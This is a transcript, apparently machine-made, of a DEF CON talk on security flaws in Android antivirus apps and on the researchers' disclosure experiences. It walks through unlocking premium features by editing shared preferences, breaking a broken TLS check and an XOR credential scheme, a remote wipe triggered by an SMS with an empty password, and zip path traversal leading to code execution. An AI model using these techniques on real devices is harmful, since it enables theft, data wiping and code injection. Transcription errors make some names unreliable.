 Oh, yeah, that's the kind of subdued, no-sleep, kind of hungover response I was looking for. So it is DefCon Sunday. Everything's a little bit slower. Everything's a little bit more chill. How many people have to go home today? Oh, that's too bad. How many people have to go to work tomorrow? You've made a huge mistake. I made that mistake once. I will never do it again. You might make alternate plans. Well, either way, thank you guys for coming out. A few years ago at a couple of different conferences, actually I got stuck with the Sunday morning hangover crowd and it was no fun. So these guys are real, real troopers for getting here up sober-ish and ready to give you guys a awesome talk about how fucked antivirus is on cell phones. So let's give Stephen and Siegfried a big round of applause. Yeah, good morning. Thank you. I'm Siegfried and this is my colleague, Stefan. And today we'll talk about antivirus applications in the mobile world. And this was joint work together with our team members, Stephen, Michael, Andreas, Philip, and Daniel. Well, so let's get started. Before we get started with the talk, a short announcement. Since this is our first DEF CON talk, and since we were both from Germany, we thought it was a cool idea to bring some local beer to DEF CON. So this is what we did. So we checked in this box of beer at the airport and the lady at the check-in counter was like, what the heck are you doing? And she said, I think it won't arrive in the US because you're not allowed to do this. And we said, well, let's give it a try. And long story short, so the box arrived and it's over there. Only one bottle didn't make it, but there are 19s left. So after the talk, please feel free to come and have a beer. OK, so let's get started with the real talk. A few words about ourselves. So Stefan, would you like to say a few words? Yeah, hello. Good morning. I'm Stefan. And I'm a member of the mobile test lab at the Fraunhofer Institute. And I'm working on mobile security, especially on Android and Android application security. Yeah, thank you. I'm Siegfried. I'm a fourth year PhD student at the German University at Kalti U Darmstadt in Fraunhofer SIT. I'm about to graduate by the end of this year. My main research focus is on static and dynamic code analysis in the context of detecting vulnerabilities or detecting malicious behavior. But this work was not only us. It is basically our team. We established a hacking group called Team Sieg half a year ago. And it's basically located at the university. And we look into different interesting security topics. And the antivirus application was one of our first projects. And we will show you now the results of our findings. OK, so let's start with a little bit about motivation. I guess I do not need a motivation here in front of you guys. But this one is an interesting one. So a lot of banking vendors, they have some FHQ in their FHQ. They're saying you should install your mobile antivirus application in order to be secure and to securely use our whatever mobile transaction banking application. So they really rely on antivirus applications. And this is somehow interesting. So do they really protect us, these antivirus applications? Or if not, then all this reliability of this banking application, for instance, is somehow broken. So let's start a little bit about some background information. As we all know, antivirus applications try to protect us. And their core is the malware detection engine or the virus detection engine. Well, it's based on signatures or behavior. But in the mobile world, apart from that, these vendors have a lot of different other features. And these features are interesting for the rest of the talk. We show four of them now. My favorite one is the loss and theft protection. So this means when you lose your device, there is a feature that you can remotely wipe or remotely block your smartphone, which some other stole from you. There is a feature called device configuration advisor, which in Android, you have a lot of security settings. And it might be the case that you did not set it in a secure way. So this application warns you and say, well, you probably should enable this or that feature. You shouldn't do this and that. There is secure browsing. Well, this is well known, I guess, from a PC world. If you would like to browse a website or if you would like to open a website, which is malicious, then they block it for you. And spam protection is in the mobile area more on SMS spam or phone spam. And depending on the vendor, some of them offer these features for free. Or some, you have to pay an amount. So it's like a pro version. So you have to pay a certain amount of money. And then you get these nice features. So let's dig a little bit deeper into these applications. I show you one application. I guess it's the Kaspersky application. And this is the manifest. So all the permission it requires. But this is not only Kaspersky. All of them require so many permission. As you can see, there is like SMS, contact, all these sensitive permission. Why? Well, it's obvious. Because from a previous slide, we've learned that they have a couple of features. And the developer, if they implement these features, they have to access certain security secure API calls. So they need all these APIs or these sensitive APIs. So well, this is somehow interesting, right? Because if you're able to do some remote code execution or something like this, you don't need actually root. So it might be enough if you only have this antivirus application installed. Because then you have access to a lot of sensitive data and you can easily send it back. So this was something where we started and it was very interesting to see. And then as a next step, what we did, we looked on the Google Play Store and we checked out a couple of applications. So we picked only those Android application which had at least 1 million downloads because they are the most interesting ones. They were Android, Helm, Manbubites, Asset, Avera, Kaspersky, MacFV, and Cheetah Mobile security. I know that there are more well-known AV vendors. The reason why we picked only these seven were we were our group had seven subgroups and each of the group looked into one application. Therefore, we had seven. But we did not look into any other vendors. So let's get started with the real talk. For this talk, we focused on four different challenges. And there were a lot more challenges. In the end of the talk, you see our white paper and a link to the white paper so you can read all the details. But for this talk, we will focus on four challenges. First, is it possible to do this premium upgrade for free? Second, my favorite one, misuse loss device feature. So is it actually possible if you have an antivirus application installed to turn it into ransomware? So actually, to turn it into malware. Third one, remotely influence the scan behavior. So targeting the heart of these AV applications. And the fourth one, is it possible to do remote code execution? In the following, we will show now a couple of examples and concrete examples. And we'll give you an overview of what we found. So let's start with the first one, premium upgrade for free. And for this example, we have two examples. The first one is on Android Helm. It's a very easy example. And the second one is a little bit more sophisticated. OK, when you look at the Play Store for this antivirus application, this Android Helm, you see that it has different versions of it. When you look very closely, it differs from the price. So it starts from euro 99, which is almost now $9, up to $129 or euros. So the reason is they offer different models. So for instance, I guess the $129 one was an unlimited usage of all the pro features. The $9.99, I guess, you can use it only for one month or something like this. It really varies. And the free version, which is a very left one, it's for free, but it doesn't have the pro features. But you can, of course, pay a certain amount and then you get the pro features. Depending on monthly or yearly basis. So as a first step, what we did, we would like to know how did they check if it paid or not. And then we looked into the code. And we found an interesting code snippet saying, thank you for upgrading to pro. And put boolean is pro and true. So for those of you who are not familiar with Android, in Android you have a so-called shared preferences file. This is an XML file which stores key value pairs. And it's only accessible within the application if you implement it in a secure way. In this case, it stores as a key is pro and as a value true. So when we looked at the shared preferences file at the installation time, so without any pro feature enabled or paying stuff, you see that there are already a couple of key value pairs stored. But there was no is pro false or something. So what would you do, right? So as a first step, of course, you add something like boolean is pro and true and see what happens. And this is what we did. We added this and then we started it. And yeah, here we go. So this was actually it. So this was enough for this application to upgrade it to pro. Just for completeness, for the first attack what I have shown, it's mandatory to have a rooted device. Now I will show you a very quick overview how you do this without root. And this is all well-known, but just for completeness. You have your mobile device on the left, and then you have the PC. And you can communicate with the PC via the ADB debug bridge. So what you do, you basically backup this application. And since the application allows the backup, it is possible to backup the application. And this backup also includes the shared preferences file. And then what you do, you basically do a little bit of scripting. And there are already a couple of scripts out there, which do this everything for you. And then you add this new line. This is pro true. And then you do a restore back into the application. And here we go. That's it. And you can do it without root. Good. So this was the warm-up. And as a next step, I would like to talk about how Asset did this. Good. In Asset, it was a little bit different, the situation. What they had, they did not check this on the client side. They checked the verification if it is a pro feature on the server side. So you have your application on the left-hand side and the back-end in the right-hand side. And what you do, you have an authentication with your username and password. And if the username and password is sent to the back-end, it is checked if this is the pro feature, if you paid for the pro feature. And if yes, it sends you back, yes, you paid. And then you can enable this. So how could an attack work? What we only what we need is the username and the password. Because if you have the username and the password, we can whatever, get our own application and set the username as a username and a password as a password. And we can basically, we have the same features as the features from the victim. So how can we do this? Because what they did, they did a good job. They did a TLS protection, at least. It was not sent by a plain text. Yeah. So what can we do? Well, there are well-known vulnerabilities to SSL, TLS. Well, we didn't like to whatever do crypto-breaking stuff or something like this. We thought, isn't there an easier way to do this? And yeah. So the problem in Android, at least, with TLS and SSL implementation is, it's not that the protocol is the problem. It's the problem that the developers implement this in an insecure way. They do some mistakes and that stuff. And a very common mistake is that they do not check the SSL certificate, for instance. More concrete, in Android, if you, for instance, as a developer, created SSL communication by HTTPS, the operating system itself checks if the certificate is really the server certificate. It does some chaining stuff. But you, as a developer, you can do this by yourself. So you can check these by yourself. And as an example, what you have to do, if you would like, whatever, do not trust Android or Google or if you say, I have my own checks, you can do this by yourself. The only thing what you have to do, you have to implement this X5 or 9 trust manager, for instance. And then you have to implement a couple of methods which do the checking. And one method is the check server trusted method. And within the body, you have to implement, for instance, SSL pinning and all that stuff, what you have to do. And, well, so this is so-did asset, for whatever reason. They implemented their own X5 or 9 trust manager. And then we also saw the check server trusted method. And, but when we looked into the body, we saw it was empty. So what does this mean? This mean they do not check if there is, if I do a man in the middle attack and I have my own certificate, this method gets called and it does nothing. So, well, SSL is basically broken, so we can do a man in the middle here. So as a first, so now we are at the situation that we can do a man in the middle. So we are sitting in the middle of asset in the backend and then we basically sniffed what's going over the wire. And as I mentioned, what we did as a test, we set up our password, our username is tester and the password was test. And then we looked at the wire. And what we found was something interesting. So the user, the license username is probably username and the value was not tester. So they somehow encrypted it additionally. So this means they did not rely on the TLS protection, so they put an additional encryption layer on the credentials which were sendable. Some are interesting. Then we were interesting, well, how do they do this? And well, when you look at the password thing, you see some interesting things. When you look at the base 64 decoded value for tester, it is one, five, D6, B1 and so on. And for test is one, five, D6 and so on. So this is somehow interesting, right? So it looks similar. So let's look a little bit deeper in this. So what we did, as next, we did a so-called chosen plain text attack. So we used as a username, for instance, a, a, a, a, a and so on. And we looked at the cipher, how the cipher looked like. When you look at this table, you see that every second byte is redundant. It's useless, so we can easily remove it. And then when you look at the positions of the plain text, the characters, so the first character, if the first character is an a, for instance, the cipher is always zero. If the first character is a b, the cipher is always b6 and so on and so forth. So this showed us that, first of all, a second byte is not required. Second, there is somehow no chaining involved in this encryption scheme. And it looks like a simple substitution. So maybe some of you have already seen how the substitution works, but I will show it to you now in more detail. So let's come to this point here. So first, we used as a letter a, and you have the cipher zero. So how can you come from an a to a zero? Obvious, right? So you use xor with a as a first position. Let's verify if this is correct. We use b the first letter, xor with a is three, right? So we do the same c, xor with a is two, which is correct here. So this showed us it is somehow just a simple xor with a key. So what do you do as a next step? Of course, you create a very long plain text. You create, when you look at the cipher, you do an xor and then you have the key. That's it. Just for verification. So first, we broke the SSLTLS communication because it was implemented in an unsecure way. Second, we figured out their encryption scheme. We have the key here. And then, for instance, for the user tester, this is the encrypted one, and then we xorred it with the key, and we got tester. So here we go. This was it, and here we go. Good. Yeah, thank you. Next challenges, so I will hand over to Stefan, and he will talk about the next three challenges. Okay, hi. I will now present the rest of our challenges, and the next will be Sigrid's favorite, misuse loss device feature. Here we have, again, our old friend, the Android Helm app. If you remember, this was the one with the sophisticated license verification. And so we thought, okay, let's look also, look into the loss device features. Shorter summary, what do we understand on the loss device features? Sigrid also explained it's a very easy function, so if you have installed this antivirus application, you can activate this feature, and if you get lost your smartphone, or it gets stolen, you can use another smartphone, or a desktop PC, and remotely activate some features like device location, remote wiping, or also remote locking. And the question is now, can we, for instance, abuse this remote wiping or this remote locking without any authentication, and so transform the antivirus application into a malware, and, for instance, lock it remotely and blackmail the user. How is remote communication in this service is implemented in common? At first, there's the Google Cloud Messaging. This is a service by Google which you can implement and use for communicating with the smartphone. There are also some other push service provider, and you also can use the SMS messaging system. This means if you want to trigger something on the device remotely, you just send an SMS message, and the application will get the message, and, for instance, execute some comment. In our case, this application uses SMS message communication. So here you see an excerpt from the application, and here it explains how the anti-staffed feature or the remote protocol for SMS is working. So by default, this feature is not activated. This is an important fact, and we will explain later why this is a problem here. And if you activate the feature, the user has to define two phone numbers from a friend. So if this device gets lost, you can go to his friend and say, hey, sorry, I want to track my device. Can you borrow me your handy? And then he can send the comment SMS. The comment SMS you see also listed here. As a prefix, you have a password. So it looks okay. You have to authenticate, and then you have a space, and then the comment. For instance, if you want to trigger the location, you send from your friend's handy an SMS with your password, a space, and the comment locate. Let's take a look more detail on the process. So on the left side, you see the user. He's sending an SMS. And the application itself is in some kind of wait state waiting for the SMS. For all Android-Aware people, it's just a simple broadcast receiver which receives the SMS message and executes some reaction. So here you see our SMS message. At the beginning, you have the password here. MyPass, separate by a space, and the comment here as an example, wipe. Internally, the application now splits the text into two parts on the space side. So we have the internal variable. Let's call it SMS password. In this case, it's our password, MyPass, and the second variable is the comment. Here it's wipe. Then there's a password check. It checks if the transferred password in the SMS is matching to the stored password in the application. If this fails, the comment will not be executed, and it's getting back to the wait state. If the password is equal, it will execute the comment. Okay, now where's the implementation flaw in this process? As I already mentioned, by default, this feature is not activated. So it means it's deactivated, and an attacker can abuse this deactivated feature. So on the left side, you again see our attacker. He will send an hour malicious SMS. For this case, he has to know the number of the victim, and he sends a simple crafted SMS. It looks like the following. At the beginning, we have an empty string. Then we have a space, then our comment, an additional space, and some irrelevant string. The application now will split at the wipe. The first variable, our SMS password, is empty. The comment you see is our wipe. And now, if you have the password check process, and the default, the password is an empty string. Now when we compare our empty string with our transferred, password, the empty string, this is matching, and the comment is executed. Now you're asking, okay. Now you're asking, but what about the friend's telephone number? Is it also checked? Yes, but it's the same process. If there's no number, it's an empty string. And also an SMS, you can spoof the number. I think this is nothing new. Okay, so as you see, there failed something in the process. Okay, second challenge. Now the third challenge is, can we remotely influence the scan engine, or the behavior of the scan engine? Here we have a new example. Here we choose the malware bite antivirus application. And at the beginning, here you see a short scheme. As you know, the most, or every antivirus application does its own signature updates every hour, every day, and so on to keep the signature database up to date. In this case, the malware bite application is doing this by plain text, HTTP. So HTTP is not anyway protected. You have no authentication, no confidentiality, no integrity check. And smartphone are wireless devices, so you can imagine wireless communication and unprotected traffic is not such a good idea. So in our first step, we set up, again, a simple man in the middle listening on the HTTP traffic. And what we saw is that the signature requests to the backend responses with the signature update. In this case, this is a SIP archive, which is additionally encrypted. Re-encryption algorithm is RC4. I don't know, but RC4 is not the best algorithm for doing secure encryption. But yeah, we were too lazy to break it, and it's much easier because the symmetric key of the signature encryption is stored in plain text in the application. So if you look into the application or make some string, you will find the crypto key. The man in the middle attacker simply decrypts the archive, can remove, for instance, the signature repackage, re-encrypt, and forward it to the victim. And now the scan engine has, as you see, empty signatures. And in the next level attack, for instance, you can send a well-known malware or a red tool and hijack the smartphone. And the victim is not protected anymore. Yeah, as I already mentioned, it's a simple plain text attack, it's not so sophisticated. So we show you the last challenge. It's more complex. It's now remote code execution. Also, can we inject in antivirus applications some foreign code and remotely trigger this code execution? And as you think, yes, we can. And we here for this example, we choose Kaspersky, antivirus and internet security application. Here again, at first, as you see, we have our HTTP requests for the signature update, no encryption, no authentication. But in this case, Kaspersky has done better work. They have implemented some integrity protection. I think the update is not so that you need confidentiality, but integrity protection is very important. So if a man in the middle attacker tries to modify the updates or the signature files, the application will reject this. So at the beginning, we thought, OK, Kaspersky has done good work. Everything is OK. So despite of this, we set up our man in the middle attacker and looked at different HTTP requests. As you can see, the application is transferring some SIP archive, some XML files, and some JAR files. What you see here in this SIP archive, this is just some company internal advertisement containing some XML HTML files, some configuration XML files, and an interesting file is the root detector.jar file. This jar file contains some Android executable code. You can imagine it's more generic as a library containing executable code, which will be loaded from the application during runtime. And in our first step, we just injected some text file into the archives. And yeah, there's a signature protection, and we could not modify or inject some executable code in this root detector. But the SIP archive seems that the SIP archive is not protected. There was no rejection when we entered our evil TXT file. Now we take a look into the application folder. Here you see now the application folder and our SIP archive, which is extracted after the update from the application. Here you see, as I mentioned, this is just some simple advertisement banner with some JavaScript, CSS, HTML files. So it seems it's not so critical. And at the end, here you see our injected evil.txt file. So at the first, we thought, OK, we can do nothing just insert the text file or just insert here some file is a problem because the code will not be executed. So let's take a more detailed look in the rest of the files the application contains. And we have some additional files. Again, you see in the middle our root detector file, which will be loaded by the update. But we have also a pdm.jar file. As I already mentioned, it contains executable code like a library, which is loaded during the runtime. But this pdm.jar file is not loaded with the update. It's part of the application. So for the Android guys, it's in the APK files. So at the first installation, the pdm.jar file is already there. As I said, it's part of the APK, contains executable code. And our root detector is signed. So this is not really a tech vector. But let's take a look at our pdm.jar file. Now we injected, instead of the text file, we injected really a pdm.jar file with our own crafted executable code. But the problem is, as you see, the pdm.jar file is still in this zip folder, or in this folder which is created by extracting the advertisement library. So we have to find some way to break out of this archive and to override the pdm.jar file. And one technique for this could be path traversing or directory traversing. This means if the zip library, for instance, which is used by Kaspersky, does not evaluate the file names in the zip archive correctly, we can perhaps inject some malformed file names. And because of missing escaping, we can break out of this directory and override this pdm.jar file. So I will now show just the exploit and explain it in a few details. As I said, we have to override the pdm file with our manipulated file. So we crafted our own zip file. And if you look at the content of the zip file, as you can see, we have our CSS, HTML, advertisement stuff, and our own pdm.jar file. But this is no folder prefix. As you see, this relative path and the dots and slashes are part of the file name. This means the whole file is named dot dot slash dot dot and so on. And because of the erroneous implementation of the zip library in the application, it will be extracted. And the pathes will be interpreted. And our pdm.jar file will be overwritten and loaded by the application on the next startup. So I give a short, try to give a short summary again of the attack because it contained more steps and was a bit more complex. And first, at the beginning, we found an unprotected communication because of the HTTP update requests. Then we augmented our zip file with this renamed directory or path traversing file. This was possible because the advertisement archive was not integrated integrity protected. And the zip library, which is used contain implementation flaw. We override existing executable code by our own code. And at the end, when the app restarts, this injected code will be executed. And this is working. We have no demo, but Reli, it was working. OK. So our challenges are solved here, or the examples we wanted to present to you. Here you see a summary of all our findings. On the top of the table, you see again the different apps we analyzed. On the left side, you saw the different type of vulnerabilities and possible attacks. And if you take a more detailed look in it, you see each application has at least two or more vulnerabilities. If you're interested on the advisories or more details of the vulnerabilities on the attacks, on the bottom, you see the link to the detailed advisories. These are also the advisories we sent to the different antivirus vendors. At the end, we want to give just some experiences which we made at the responsible disclosure process with the different companies. We informed all companies. But as you see, one did not fix the vulnerability. They did not react on our announcement. We tried several ways. We sent emails. We tried web forms. We tried also to contact them by the Google Play Store. But there was no reaction. So if someone is here from Android Helm, please come up later. Or at the end, you find our contact information. Other fails we had during the responsible disclosure was there are companies which provide websites where you can announce your found vulnerability. And they also provide a public key that you can transfer your email confidential. But on one, the public key was expired. So how to transfer it? I wrote an email. Can you send me a key? Comes the answer. The key is on the website. I wrote again. The key is expired. OK, thank you. We send you a new one. Another website contains a public key, PGP key. And it was valid. But the email was not matching. So again, send me a correct email. And some other also did not react. We phoned them by email and so on. But there we had luck because we met the research director of antivirus security of this company at some conference. I was telling him about my problem. Half an hour later, I had a PGP key and an email. What did we learn? Yeah, also big security companies fail in implementation. Its developer are just humans. Human makes mistakes. But on the other side, and these companies work a lot of people who are aware of these problems. And they sometimes should look into their own code or make some code audit internally or externally. There's the room for the improvement and the responsible disclosure process. And the last thing, it's a bit more funny. They also, it seems, they also reuse their code in different products. Because I think most of you know the name, Tavis Romandi. He was also hunting bugs in Windows antivirus applications. And we found also one bug, which he found in another application. But he was faster in announcing it, so I missed the bug bounty. This is our presentation. Here you can see our contact information, also our Twitter handle, and the website of our students group. They also find the advisories and more information about our project. And yeah, thank you for your attention. If you have questions, feel free. You're also a secret announced. You can meet us later or here now. We have some beer. We can drink a beer or discuss about this security or Android security. Just feel free. Yeah, thank you.